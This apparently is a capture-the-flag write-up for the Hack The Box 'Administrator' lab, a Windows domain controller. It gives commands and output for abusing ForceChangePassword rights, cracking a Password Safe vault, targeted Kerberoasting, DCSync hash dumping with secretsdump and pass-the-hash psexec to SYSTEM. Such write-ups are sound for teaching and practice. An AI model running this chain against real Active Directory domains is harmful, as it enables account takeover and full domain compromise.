Hack The Box · Lab
Administrator

Administrator

MediumWindowsActive DirectoryPassword Attacks

SCOPE

IP HOSTNAME DOMAIN OS
10.10.11.42 DC administrator.htb Windows Server 2022 x64

ATTACK

1. Port Scan

nmap -sV -sC -T3 -p21,53,88,139,389,445,5985 10.10.11.42 --open -oN administrator.nmap

PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows AD LDAP (Domain: administrator.htb)
445/tcp open  microsoft-ds?
5985/tcp open http          Microsoft HTTPAPI 2.0

FTP plus a full DC profile. Initial credentials for olivia are provided at machine start.

2. BloodHound — ACL Chain Discovery

Ingest BloodHound data as olivia. The graph reveals a linear delegation chain:

olivia → ForceChangePassword → michael
michael → ForceChangePassword → benjamin
benjamin → FTP access

Each user has the ability to reset the next user's password without knowing it.

3. ACL Abuse — ForceChangePassword Chain

Reset michael's password using olivia's credentials:

net rpc password 'michael' 'Password123!' \
  -U 'administrator/olivia%<REDACTED>' -S 10.10.11.42

Reset benjamin's password using michael's new credentials:

net rpc password 'benjamin' 'Password123!' \
  -U 'administrator/michael%Password123!' -S 10.10.11.42

4. FTP — Password Safe Archive

Log in to FTP as benjamin:

nxc ftp 10.10.11.42 -u benjamin -p 'Password123!' --ls

[+] benjamin:Password123!
[*] Directory Listing
10-05-24  09:13AM    952  Backup.psafe3

Download the Password Safe 3 archive. The .psafe3 format is a credential vault encrypted with a master password. Crack it:

hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

Backup.psafe3:<REDACTED>

Open the vault with pwsafe or compatible client — it contains credentials for multiple domain accounts including emily.

emily : <REDACTED>

5. Targeted Kerberoasting — ethan

BloodHound shows emily has GenericWrite over ethan, enabling targeted Kerberoasting — assign a temporary SPN to ethan's account and request a TGS:

targetedKerberoast.py -v -d 'administrator.htb' \
  -u 'emily' -p '<REDACTED>' --request-user ethan

[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$<hash>

Crack offline:

hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt

<hash>:<REDACTED>

ethan:<REDACTED>.

6. DCSync — ethan

ethan has DCSync rights (GetChanges + GetChangesAll). Dump all domain hashes:

secretsdump.py 'administrator.htb/ethan:<REDACTED>@10.10.11.42'

[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
...

7. psexec → SYSTEM

psexec.py Administrator@10.10.11.42 -hashes :<REDACTED>

C:\Windows\system32> whoami
nt authority\system

root.txt is at C:\Users\Administrator\Desktop\root.txt.

FULL ATTACK CHAIN

olivia creds provided at start
→ BloodHound: olivia → ForceChangePassword → michael → ForceChangePassword → benjamin
→ net rpc password → reset michael, then benjamin
→ FTP as benjamin → Backup.psafe3
→ hashcat psafe3 → vault password
→ vault contains emily credentials
→ emily GenericWrite over ethan → targetedKerberoast → ethan TGS → crack
→ ethan DCSync → Administrator NTLM
→ psexec → nt authority\system → root.txt

ⓒ 0xNRG